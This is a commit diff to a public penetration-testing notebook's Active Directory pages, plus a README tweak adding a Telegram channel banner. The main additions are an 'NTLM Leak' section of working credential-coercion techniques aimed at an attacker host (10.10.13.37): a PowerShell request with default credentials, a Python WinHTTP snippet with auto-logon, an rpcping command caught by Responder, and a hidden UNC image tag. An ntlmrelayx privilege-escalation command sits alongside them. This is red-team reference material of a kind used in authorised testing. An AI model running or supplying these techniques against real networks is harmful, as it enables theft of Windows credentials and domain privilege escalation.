[AHK] Automatic update 👽

snovvcrash · May 20, 2024 · b867dd9 · b867dd9
1 parent aa425fa
commit b867dd9
Show file tree

Hide file tree

Showing 4 changed files with 32 additions and 17 deletions.
diff --git a/.gitbook/assets/OffensiveTwitter.png b/.gitbook/assets/OffensiveTwitter.png
diff --git a/README.md b/README.md
@@ -18,12 +18,14 @@ While taking these notes, one main rule is that all the given techniques are act
 **DEPRECATED.** The previous version of PPN is right [here](https://snovvcrash.rocks/PPN/).
 {% endhint %}
 
+## Twitter Bot
+
+[![](/.gitbook/assets/OffensiveTwitter.png)](https://t.me/OffensiveTwitter)
+
 ## About
 
 {% embed url="https://snovvcrash.rocks/" caption="Blog" %}
 
 {% embed url="https://github.com/snovvcrash" caption="GitHub" %}
 
 {% embed url="https://infosec.exchange/@snovvcrash" caption="Mastodon" %}
-
-{% embed url="https://t.me/OffensiveTwitter" caption="Offensive Twitter" %}
diff --git a/pentest/infrastructure/ad/acl-abuse.md b/pentest/infrastructure/ad/acl-abuse.md
@@ -288,18 +288,6 @@ PS > IWR http://10.10.13.37 -UseDefaultCredentials
 $ ntlmrelayx.py -t ldap://DC01.megacorp.local --escalate-user snovvcrash --no-smb-server --no-wcf-server --no-raw-server --no-dump --no-da --no-acl --no-validate-privs
 ```
 
-Coerce auth [using Python](https://stackoverflow.com/a/35577331):
-
-```python
-import win32com.client
-URL = 'http://10.10.13.37/a'    
-COM_OBJ = win32com.client.Dispatch('WinHTTP.WinHTTPRequest.5.1')
-COM_OBJ.SetAutoLogonPolicy(0)
-COM_OBJ.Open('GET', URL, False)
-COM_OBJ.Send()
-print(COM_OBJ.ResponseText)
-```
-
 Using Impacket **dacledit.py**:
 
 ```

diff --git a/pentest/infrastructure/ad/authentication-coercion.md b/pentest/infrastructure/ad/authentication-coercion.md
@@ -202,17 +202,42 @@ Put the `.searchConnector-ms` file on a writable share. When a domain user opens
 
 
 
-## Force SMB authentication
+## NTLM Leak
 
 - [https://github.com/xct/hashgrab](https://github.com/xct/hashgrab)
+- [https://github.com/Gl3bGl4z/All_NTLM_leak](https://github.com/Gl3bGl4z/All_NTLM_leak)
 
-Forcing with a hidden image:
+Leak with PowerShell:
+
+```
+PS > IWR -UseDefaultCredentials http://10.10.13.37/index.html
+```
+
+Leak [with Python](https://stackoverflow.com/a/35577331):
+
+```python
+import win32com.client
+URL = 'http://10.10.13.37/index.html'
+COM_OBJ = win32com.client.Dispatch('WinHTTP.WinHTTPRequest.5.1')
+COM_OBJ.SetAutoLogonPolicy(0)
+COM_OBJ.Open('GET', URL, False)
+COM_OBJ.Send()
+print(COM_OBJ.ResponseText)
+```
+
+Leak with rpcping (catch with Responder's DCE-RPC listener):
+
+```
+Cmd > rpcping -s 10.10.13.37 -e 135 -a privacy -u NTLM
+```
+
+Leak with a hidden image:
 
 ```html
 <img src="\\10.10.13.37\pwn.ico" height="1" width="1" />
 ```
 
-Forcing with a shortcut:
+Leak with a shortcut:
 
 {% code title="lnk.ps1" %}
 ```powershell